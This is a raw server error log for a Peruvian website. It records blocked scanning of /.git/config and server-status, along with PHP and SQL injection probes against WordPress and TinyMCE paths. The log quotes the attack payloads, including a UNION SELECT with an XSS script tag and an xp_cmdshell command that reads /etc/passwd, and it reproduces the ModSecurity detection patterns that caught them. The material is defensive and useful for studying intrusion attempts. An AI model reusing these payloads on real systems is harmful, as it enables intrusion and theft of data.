2024/08/08 03:45:15 [error] 10064#10064: *380764 access forbidden by rule, client: 45.148.10.206, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Aug 08 03:48:26.710232 2024] [authz_core:error] [pid 10105:tid 139642019976960] [client 139.162.155.225:58934] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/08 03:48:30 [error] 10064#10064: *380800 access forbidden by rule, client: 139.162.155.225, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/08/08 03:50:08 [error] 10064#10064: *380820 access forbidden by rule, client: 45.148.10.206, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/08/08 04:16:51 [error] 10064#10064: *381094 access forbidden by rule, client: 45.148.10.206, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/08/08 05:27:28 [error] 10064#10064: *381650 access forbidden by rule, client: 45.148.10.206, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/08/08 06:12:06 [error] 10064#10064: *382057 access forbidden by rule, client: 45.148.10.206, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Thu Aug 08 07:07:05.913748 2024] [authz_core:error] [pid 10133:tid 139642019976960] [client 164.92.244.132:33488] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/08 07:07:10 [error] 10064#10064: *382487 access forbidden by rule, client: 164.92.244.132, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Aug 08 14:29:48.053843 2024] [authz_core:error] [pid 10723:tid 139642078725888] [client 172.105.16.131:41396] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/08 14:29:50 [error] 10065#10065: *386628 access forbidden by rule, client: 172.105.16.131, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Aug 08 23:20:04.635364 2024] [:error] [pid 8327:tid 139641969620736] [client 35.221.110.175:55486] [client 35.221.110.175] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZrWY9I9FkD1VtOengzYcuQAAABU"], referer: www.google.com [Thu Aug 08 23:20:28.594007 2024] [:error] [pid 8462:tid 139641961228032] [client 35.221.110.175:55496] [client 35.221.110.175] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZrWZDLvrdKoHHwaSFBVImQAAANY"], referer: www.google.com [Fri Aug 09 14:09:07.227431 2024] [:error] [pid 7513:tid 140683843127040] [client 35.197.230.133:47640] [client 35.197.230.133] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZrZpU4XsUstmtqTBvhqb-wAAABQ"], referer: www.google.com [Fri Aug 09 14:09:18.073932 2024] [:error] [pid 15926:tid 140683994195712] [client 35.197.230.133:47644] [client 35.197.230.133] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZrZpXmS4peIYH1ltMZQr2AAAAUI"], referer: www.google.com [Fri Aug 09 20:19:09.408453 2024] [:error] [pid 15926:tid 140683868305152] [client 34.65.224.5:55708] [client 34.65.224.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZrbADWS4peIYH1ltMZQu8QAAAVE"], referer: www.google.com [Fri Aug 09 20:19:19.811895 2024] [:error] [pid 15926:tid 140683843127040] [client 34.65.224.5:55710] [client 34.65.224.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZrbAF2S4peIYH1ltMZQu8gAAAVQ"], referer: www.google.com [Sat Aug 10 07:49:12.685491 2024] [authz_core:error] [pid 7249:tid 140327864174336] [client 167.71.175.236:38084] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/10 07:49:16 [error] 6588#6588: *417244 access forbidden by rule, client: 167.71.175.236, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Aug 10 11:03:38.448715 2024] [authz_core:error] [pid 15280:tid 140327956494080] [client 142.93.143.8:42186] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/10 11:03:42 [error] 6587#6587: *419532 access forbidden by rule, client: 142.93.143.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Aug 10 15:28:55.954837 2024] [autoindex:error] [pid 6630:tid 140327990064896] [client 4.213.175.135:47466] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Aug 10 22:40:13.822837 2024] [:error] [pid 15280:tid 140327880959744] [client 152.69.197.60:54886] [client 152.69.197.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:foo. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php"] [unique_id "ZrgynevCB4vAi4WeFpvgBgAAAQ4"] [Sat Aug 10 22:40:14.187129 2024] [:error] [pid 6630:tid 140327830603520] [client 152.69.197.60:54888] [client 152.69.197.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:foo. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/templates/default/js/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php"] [unique_id "ZrgynhV5O-d7z55zsfw8LgAAABQ"] [Sat Aug 10 22:40:14.532753 2024] [:error] [pid 7249:tid 140327880959744] [client 152.69.197.60:54890] [client 152.69.197.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:foo. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/js/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php"] [unique_id "ZrgyntrGIw7FJfVuHT2TXAAAAM4"] [Sat Aug 10 22:40:14.877494 2024] [:error] [pid 6631:tid 140327897745152] [client 152.69.197.60:54892] [client 152.69.197.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:foo. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/plugins/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php"] [unique_id "ZrgynoXW-W9T5UQQTvlLkgAAAEw"] 2024/08/11 16:30:49 [error] 10963#10963: *438038 access forbidden by rule, client: 45.148.10.142, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/08/11 19:41:31 [error] 10964#10964: *439344 access forbidden by rule, client: 45.148.10.142, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/08/11 22:14:35 [error] 10963#10963: *440401 access forbidden by rule, client: 45.148.10.142, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/08/12 00:37:09 [error] 10964#10964: *441728 access forbidden by rule, client: 45.148.10.142, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/08/12 01:00:22 [error] 10963#10963: *442139 access forbidden by rule, client: 45.148.10.142, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Mon Aug 12 09:04:50.272090 2024] [authz_core:error] [pid 7653:tid 140083462084352] [client 23.239.21.238:60276] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/12 09:04:56 [error] 7621#7621: *446697 access forbidden by rule, client: 23.239.21.238, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Aug 12 11:35:14.535609 2024] [authz_core:error] [pid 8268:tid 140083436906240] [client 146.190.103.103:47666] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/12 11:35:21 [error] 7622#7622: *454499 access forbidden by rule, client: 146.190.103.103, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Mon Aug 12 12:46:05.642125 2024] [:error] [pid 25421:tid 140083495655168] [client 34.65.43.143:49570] [client 34.65.43.143] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZrpKXShSAVEWjhafBRpQdAAAARE"], referer: www.google.com [Mon Aug 12 12:46:10.157990 2024] [:error] [pid 25421:tid 140083462084352] [client 34.65.43.143:49574] [client 34.65.43.143] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZrpKYihSAVEWjhafBRpQdQAAARU"], referer: www.google.com 2024/08/13 22:26:11 [error] 6476#6476: *476390 access forbidden by rule, client: 195.178.110.35, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/08/13 23:24:15 [error] 6477#6477: *476847 access forbidden by rule, client: 195.178.110.35, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/08/14 01:00:06 [error] 6476#6476: *477672 access forbidden by rule, client: 195.178.110.35, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/08/14 01:03:07 [error] 6476#6476: *477688 access forbidden by rule, client: 195.178.110.35, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Aug 14 07:43:09.777833 2024] [authz_core:error] [pid 31335:tid 139653814351616] [client 164.90.208.56:36570] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/14 07:43:15 [error] 31297#31297: *481129 access forbidden by rule, client: 164.90.208.56, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Aug 14 09:42:28.986035 2024] [authz_core:error] [pid 31336:tid 139653940242176] [client 188.166.108.93:38454] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/14 09:42:33 [error] 31297#31297: *481982 access forbidden by rule, client: 188.166.108.93, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/08/14 10:09:24 [error] 31298#31298: *482102 access forbidden by rule, client: 195.178.110.35, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/08/14 10:20:52 [error] 31297#31297: *482159 access forbidden by rule, client: 195.178.110.35, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/08/14 15:27:45 [error] 31297#31297: *485578 access forbidden by rule, client: 195.178.110.35, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Thu Aug 15 03:21:00.152302 2024] [:error] [pid 31337:tid 139654066464512] [client 141.98.81.52:56482] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:OzLv=8731 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:OzLv=8731 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert(\\x22XSS\\x22)</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#: ozlv=8731 and 1=1 union all select 1 null <script>alert(xss)</script> table_name from information_schema.tables where 2>1--/**/ exec xp_cmdshell(cat ../../../etc/passwd)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26bOwCyyCVFXh0DMS2UgAAAIA"] [Thu Aug 15 03:21:14.311915 2024] [:error] [pid 31519:tid 139653906671360] [client 141.98.81.52:56496] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 1324= found within ARGS:url: https://investigacionperu.com/contacto/) AND 1324=3284 AND (8029=8029"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26enxeJlWfH1pdny5W6AAAAMs"] [Thu Aug 15 03:21:15.170051 2024] [:error] [pid 31519:tid 139653948634880] [client 141.98.81.52:56502] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 6748= found within ARGS:url: https://investigacionperu.com/contacto/) AND 6748=6748 AND (9734=9734"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26e3xeJlWfH1pdny5W6gAAAMY"] [Thu Aug 15 03:21:15.890170 2024] [:error] [pid 31337:tid 139654024500992] [client 141.98.81.52:56504] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 9981= found within ARGS:url: https://investigacionperu.com/contacto/ AND 9981=2871"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26e-wCyyCVFXh0DMS2VQAAAIU"] [Thu Aug 15 03:21:16.289938 2024] [:error] [pid 31519:tid 139653831137024] [client 141.98.81.52:56506] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 6748= found within ARGS:url: https://investigacionperu.com/contacto/ AND 6748=6748"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26fHxeJlWfH1pdny5W6wAAANQ"] [Thu Aug 15 03:21:16.689857 2024] [:error] [pid 31519:tid 139654058071808] [client 141.98.81.52:56508] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] 